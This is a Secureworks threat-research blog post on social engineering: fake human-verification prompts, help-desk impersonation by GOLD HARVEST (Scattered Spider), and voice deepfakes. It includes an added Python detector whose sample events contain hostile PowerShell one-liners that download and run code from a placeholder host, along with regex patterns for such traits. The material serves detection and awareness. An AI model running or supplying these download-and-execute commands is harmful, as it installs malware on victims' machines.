
Social Engineering – Just Say No

Organizations can reduce risk by empowering employees to question or refuse suspicious requests.

Employees, particularly help desk staff, need to feel empowered to say “no” to suspicious requests or offers. They should also have an easily accessible channel for reporting the suspicious activity. The need is increasing as threat actors become more innovative. In 2024, Secureworks® Counter Threat Unit™ (CTU) researchers regularly encountered cybercriminals using novel social engineering techniques to dupe employees into helping to breach their employers' networks.

In general, cybercriminal activity is almost entirely opportunistic, and victimization is based on exposed vulnerabilities or available stolen credentials. Traditional social engineering tactics often rely on broad distribution, such as bulk phishing emails. In one novel opportunistic campaign, individuals searching for movies or other online streaming content on their corporate devices were served fake human verification prompts. The victims were required to complete a series of keyboard sequences to ‘prove’ they were human before they could access the content. These actions caused execution of malicious PowerShell code that downloaded infostealer malware.
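The fake verification chain described above ends with explorer.exe launching PowerShell from the Run dialog, which is what a defender can look for in process-creation telemetry. The following is an added example, not Secureworks or CTU code; it assumes Sysmon-style event fields (parent, image, cmdline), and the events it scans are constructed samples.

```python
import base64
import re

# Constructed process-creation events (Sysmon event 1 style, simplified); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/v | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc " + base64.b64encode(
         "irm http://example.invalid/s | iex".encode("utf-16-le")).decode()},
    {"parent": r"C:\Program Files\Git\git-bash.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File build.ps1"},
]

# Binaries a Run-dialog paste typically launches, and the traits of a staged download.
LAUNCHERS = ("powershell.exe", "pwsh.exe", "mshta.exe")
TRAITS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-ep\s+bypass|\biwr\b|\birm\b|invoke-webrequest"
    r"|downloadstring|\|\s*iex\b|https?://", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def effective_cmdline(cmdline: str) -> str:
    """Return the command line plus any -enc payload decoded (base64 of UTF-16LE)."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return cmdline  # undecodable blob: keep the raw line, still scored below


def clickfix_reasons(event: dict) -> list:
    """Reasons this event matches the paste-into-Run chain; empty list if benign."""
    reasons = []
    if not event["parent"].lower().endswith("\\explorer.exe"):
        return reasons  # the chain starts from the shell, not from a build tool or IDE
    if event["image"].lower().endswith(LAUNCHERS):
        reasons.append("explorer.exe spawned " + event["image"].rsplit("\\", 1)[-1])
    hits = sorted({h.lower() for h in TRAITS.findall(effective_cmdline(event["cmdline"]))})
    if hits:
        reasons.append("suspicious traits: " + ", ".join(hits))
    if ENCODED.search(event["cmdline"]):
        reasons.append("encoded command")
    return reasons if len(reasons) >= 2 else []  # launcher plus at least one more signal
```

Requiring two signals keeps a plain `explorer.exe -> powershell.exe` launch (a user opening a console) from alerting on its own.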

Newer social engineering tactics could suggest that threat actors sometimes preselect and research their targets. GOLD REBELLION has been observed spamming users with thousands of emails before posing as IT help desk workers via Teams or email and offering assistance to stop the flood. This ‘help’ takes the form of installing legitimate remote access tools such as AnyDesk or Microsoft Quick Assist on the victim's computer, which gives the threat actor control of the device.

In other incidents, a threat actor called the target organization's help desk and impersonated a senior employee to request a credential reset. The reset allowed the threat actor to log in to the victim's environment, likely with the intention of stealing data and deploying ransomware. On one occasion, the initial victim did not have sufficient privileges, so the threat actor called the help desk again and posed as another employee to make the same request. Some of the tools used during these incidents suggest links to the GOLD HARVEST threat group (also known as Scattered Spider). This group was likely responsible for the high-profile 2023 ransomware attacks on Las Vegas giants MGM Resorts and Caesars Entertainment, working as affiliates of the BlackCat (also known as ALPHV) ransomware scheme operated by GOLD BLAZER. The MGM Resorts attack alone reportedly netted $100 million USD. Alleged members of GOLD HARVEST were arrested in England and Spain during 2024.

GOLD HARVEST, which comprises at least some native English-speaking threat actors, has a history of using voice-based social engineering in its attacks. In addition to deceiving help desk employees, the threat actors have used phone calls and SMS messages to convince victims to visit credential-harvesting sites, share one-time passwords, and accept multi-factor authentication (MFA) push requests, as well as to download remote access tools. The group has also used social engineering against mobile carrier support staff in SIM swap attacks to bypass MFA.

These voice-based attacks require the threat actors to be able to credibly impersonate the executive or employee they claim to be. In the short term, this need may change Russian cybercriminals' traditional reluctance to work with English-speaking threat actors. CTU™ researchers have observed threat groups advertising for native English-language (as well as French, Spanish, and other non-Russian-language) speakers on underground forums. In the medium term, artificial intelligence (AI) will exacerbate the threat from voice-based social engineering. AI voice-based deepfakes have been used in attacks against individuals, in CEO fraud, and in disinformation campaigns.

Voice-based social engineering may appeal to threat actors because it circumvents even comprehensive technical controls. It also produces a sense of urgency. Help desk operators who fell victim to the GOLD HARVEST attacks said that they felt pressured when speaking to individuals they believed were senior personnel in their organization. Saying no to a credential-reset request from a C-level executive can be daunting.

To defend successfully against these types of attacks, that hesitancy needs to change. One of the most powerful defenses organizations can put in place against voice-based social engineering is to make it acceptable for help desk staff not to help. Employees must have the right to politely refuse requests that seem suspicious, no matter who they are from, until the employees can confirm that the request is genuine.

Learn more about GOLD HARVEST activity and fake human verification prompts. If you need urgent assistance with an incident, contact the Secureworks Incident Response team.


ABOUT THE AUTHOR
COUNTER THREAT UNIT RESEARCH TEAM

Secureworks Counter Threat Unit™ (CTU) researchers frequently serve as expert resources for the media, publish technical analyses for the security community, and speak about emerging threats at security conferences. Leveraging Secureworks’ advanced security technologies and a network of industry contacts, the CTU™ research team tracks threat actors and analyzes anomalous activity, uncovering new attack techniques and threats. This process enables CTU researchers to identify threats as they emerge and develop countermeasures that protect customers before damage can occur.
